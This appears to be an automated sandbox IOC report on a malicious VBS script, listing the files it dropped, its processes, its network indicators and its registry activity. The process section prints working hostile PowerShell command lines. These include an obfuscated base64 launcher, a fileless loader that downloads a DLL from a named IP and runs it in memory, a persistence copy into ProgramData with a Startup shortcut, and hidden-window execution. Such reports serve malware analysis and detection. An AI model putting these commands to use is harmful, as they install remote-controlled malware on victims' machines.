IOC Report
daveCrpted.vbs

loading gif

Files

File Path
Type
Category
Malicious
daveCrpted.vbs
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
initial sample
malicious
C:\ProgramData\Done.vbs
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
dropped
malicious
C:\ProgramData\Done.vbs:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04g23aso.ckf.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_113xeubt.0rn.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14hqbqjj.gxr.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dgawbhw.o05.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5saywipd.men.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu4y3ysi.wmb.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnxlvzx1.xhq.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzbo1jkc.hpz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iplajpvg.nby.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laq4ftm4.4mp.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmjsncm.0lo.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfeyzexk.3oy.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy35pvwd.ng5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdtgx0ab.jx5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\203a5f290b65cc8e.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BCYMZUG86WIB33RE6HLM.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Wed Apr 11 22:35:26 2018, mtime=Sat May 28 03:15:32 2022, atime=Wed Apr 11 22:35:26 2018, length=447488, window=hidenormalshowminimized
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875.1eplhr3P.20220527211616.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875.6BQNrnBR.20220527211548.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875.QizwF1Bj.20220527211550.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875._396rmPr.20220527211537.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875.bfCcr7J2.20220527211526.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875.hz5nZdhI.20220527211619.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220527\PowerShell_transcript.783875.zMIa0yAZ.20220527211523.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
There are 19 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
malicious
C:\Windows\SysWOW64\cmmon32.exe
C:\Windows\SysWOW64\cmmon32.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
malicious
C:\Windows\explorer.exe
explorer.exe
malicious
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 11 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://2.56.57.22/tsdfguhijk.txt
2.56.57.22
malicious
http://20.6.
unknown
malicious
http://2.56.57.22
unknown
malicious
http://2.5
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk
unknown
malicious
http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
20.106.232.4
malicious
https://contoso.com/
unknown
malicious
https://contoso.com/License
unknown
malicious
http://20.106.232.4/dll/26-05-2022-StartUp.pdf
20.106.232.4
malicious
https://contoso.com/Icon
unknown
malicious
http://20.106.232.48
unknown
malicious
http://20.106.232.4
unknown
malicious
http://2.56.57.22x
unknown
malicious
http://2.56.57.22/ts
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.hibikaiteki.com
118.27.122.216
www.nancykmorrison.store
172.67.160.125

IPs

IP
Domain
Country
Malicious
20.106.232.4
unknown
United States
malicious
192.168.2.1
unknown
unknown
2.56.57.22
unknown
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\StagingInfo\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
DriveNumber
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Unpacker
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ef47ea26-ec76-4a6e-8680-9e53b539546d}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4b110390-e32a-400c-bf41-7fe93773464a}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{b8455d9b-4916-480e-8b44-905b33ca001e}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}
Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001036A
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010340
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010330
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010332
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010342
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001033E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010336
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001032E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001032C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010318
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000010314
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001030E
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000001030C
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000102E8
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000102F2
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000102EE
VirtualDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Search
InstalledWin32AppsRevision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\CloudStore\Store\Cache\DefaultAccount\$$windows.data.signals.registrations\Current
Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Bags\1\Desktop
IconLayouts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Search
InstalledWin32AppsRevision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101
CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp2\OpenWithProgids
WMP11.AssocFile.3G2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp\OpenWithProgids
WMP11.AssocFile.3GP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aac\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adt\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.adts\OpenWithProgids
WMP11.AssocFile.ADTS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithProgids
WMP11.AssocFile.AIFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asf\OpenWithProgids
WMP11.AssocFile.ASF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.asx\OpenWithProgids
WMP11.AssocFile.ASX
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithProgids
WMP11.AssocFile.AU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au3\OpenWithProgids
AutoIt3Script
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithProgids
WMP11.AssocFile.AVI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\OpenWithProgids
CABFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cdxml\OpenWithProgids
Microsoft.PowerShellCmdletDefinitionXML.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.contact\OpenWithProgids
contact_wab_auto_file
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.css\OpenWithProgids
CSSfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.csv\OpenWithProgids
Excel.CSV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dds\OpenWithProgids
ddsfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dib\OpenWithProgids
Paint.Picture
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
dllfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
Word.Document.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docm\OpenWithProgids
Word.DocumentMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithProgids
Word.Document.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dot\OpenWithProgids
Word.Template.8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotm\OpenWithProgids
Word.TemplateMacroEnabled.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dotx\OpenWithProgids
Word.Template.12
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.emf\OpenWithProgids
emffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
exefile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\OpenWithProgids
WMP11.AssocFile.FLAC
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fon\OpenWithProgids
fonfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithProgids
giffile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
htmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance
MessageTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ico\OpenWithProgids
icofile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ini\OpenWithProgids
inifile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jfif\OpenWithProgids
pjpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpe\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpeg\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithProgids
jpegfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jxr\OpenWithProgids
wdpfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids
lnkfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2t\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2ts\OpenWithProgids
WMP11.AssocFile.M2TS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\OpenWithProgids
WMP11.AssocFile.m3u
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4a\OpenWithProgids
WMP11.AssocFile.M4A
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithProgids
mhtmlfile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\OpenWithProgids
WMP11.AssocFile.MIDI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MK3D\OpenWithProgids
WMP11.AssocFile.MK3D
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mka\OpenWithProgids
WMP11.AssocFile.MKA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mkv\OpenWithProgids
WMP11.AssocFile.MKV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mod\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mov\OpenWithProgids
WMP11.AssocFile.MOV
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MP2\OpenWithProgids
WMP11.AssocFile.MP3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2v\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\OpenWithProgids
WMP11.AssocFile.MP3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4v\OpenWithProgids
WMP11.AssocFile.MP4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpa\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MPE\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg\OpenWithProgids
WMP11.AssocFile.MPEG
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithProgids
WMP11.AssocFile.MPEG
